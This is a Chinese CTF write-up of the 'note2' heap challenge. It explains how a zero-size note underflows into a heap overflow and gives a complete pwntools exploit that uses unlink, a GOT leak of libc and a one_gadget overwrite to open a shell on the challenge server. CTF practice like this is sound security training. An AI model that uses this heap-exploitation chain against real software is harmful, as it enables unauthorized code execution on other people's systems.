image.png
    没有pie还有可以改got表,大概攻击就是这样改got表
    image.png
    这里就是漏洞,我是没找到,最后看了别人的博客才明白。如果说我们申请的堆块的大小等于零的话在这里因为是无符号数,-1就会变的很大,就存在了一个堆溢出的漏洞
    image.png
    我们申请的堆块数和size就有了限制
    然后ida里有控制堆块的地址,所以我们选择unlink是一个明智之举

    1. io.recvuntil("Input your name:")
    2. io.sendline("abcd")
    3. #bin_sh_addr = 0x6020e0
    4. io.recvuntil("Input your address:")
    5. io.sendline("abcd")
    6. ptr = 0x602120
    7. fd_addr = ptr - 0x18
    8. bk_addr = ptr - 0x10
    9. payload = p64(0)+p64(0xa1)+p64(fd_addr)+p64(bk_addr)
    10. creat(0x80,payload) #0
    11. creat(0,"bbbb") #1
    12. creat(0x80,"cccc")  #2
    13. #edit(1,1,"dddddddddddddddd")
    14. delete(1)

    unlink的过程,然后我们要泄露libc的地址,我们只要往控制堆块修改成got表,然后打印出来就能得到对应的地址,然后用one_gadget直接打通

    1. from pwn import*
    2. from LibcSearcher import*
    3. context.log_level = 'debug'
    4. #context.arch = 'amd64'
    5. io =process('./note2')
    6. io = remote("node4.buuoj.cn",25465)
    7. elf = ELF('./note2')
    8. libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    9. libc = ELF('libc-2.23.so')
    10. def debug():
    11.     gdb.attach(io)
    12.     pause()
    13. def creat(size,value):
    14.     io.recvuntil("option--->>")
    15.     io.sendline("1")
    16.     io.recvuntil("Input the length of the note content:(less than 128)")
    17.     io.sendline(str(size))
    18.     io.recvuntil("Input the note content:")
    19.     io.sendline(value)
    20. def show(id):
    21.     io.recvuntil("option--->>")
    22.     io.sendline("2")
    23.     io.recvuntil("Input the id of the note:")
    24.     io.sendline(str(id))
    25. def edit(id,choice,value):
    26.     io.recvuntil("option--->>")
    27.     io.sendline("3")
    28.     io.recvuntil("Input the id of the note:")
    29.     io.sendline(str(id))
    30.     io.recvuntil("do you want to overwrite or append?[1.overwrite/2.append]")
    31.     io.sendline(str(choice))
    32.     io.recvuntil("TheNewContents:")
    33.     io.sendline(value)
    35. def delete(id):
    36.     io.recvuntil("option--->>")
    37.     io.sendline("4")
    38.     io.recvuntil("Input the id of the note:")
    39.     io.sendline(str(id))
    41. io.recvuntil("Input your name:")
    42. io.sendline("abcd")
    43. #bin_sh_addr = 0x6020e0
    44. io.recvuntil("Input your address:")
    45. io.sendline("abcd")
    46. ptr = 0x602120
    47. fd_addr = ptr - 0x18
    48. bk_addr = ptr - 0x10
    49. payload = p64(0)+p64(0xa1)+p64(fd_addr)+p64(bk_addr)
    50. creat(0x80,payload) #0
    51. creat(0,"bbbb") #1
    52. creat(0x80,"cccc")  #2
    53. #edit(1,1,"dddddddddddddddd")
    54. delete(1)
    55. payload = p64(0)*2+p64(0xa0)+p64(0x90)
    56. creat(0,payload)
    57. delete(2)
    58. free_got = elf.got["free"]
    59. payload = b'a'*24+p64(free_got)
    60. edit(0,1,payload)#3
    61. #debug()
    62. show(0)
    63. #debug()
    64. free_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    65. log.success("free_addr---------->"+hex(free_addr))
    66. libcbase = free_addr - libc.sym["free"]
    67. log.success("libcbase---------->"+hex(libcbase))
    68. #debug()
    69. system_addr = libcbase +libc.sym["system"]
    70. one_gadget = [0x45216,0x4526a,0xf02a4]
    72. payload= p64(one_gadget[2]+libcbase)
    73. edit(0,1,payload)
    74. #delete(0)
    75. io.interactive()

    总结,就是漏洞的地方要找到,我确实没有找到,又是积攒一波经验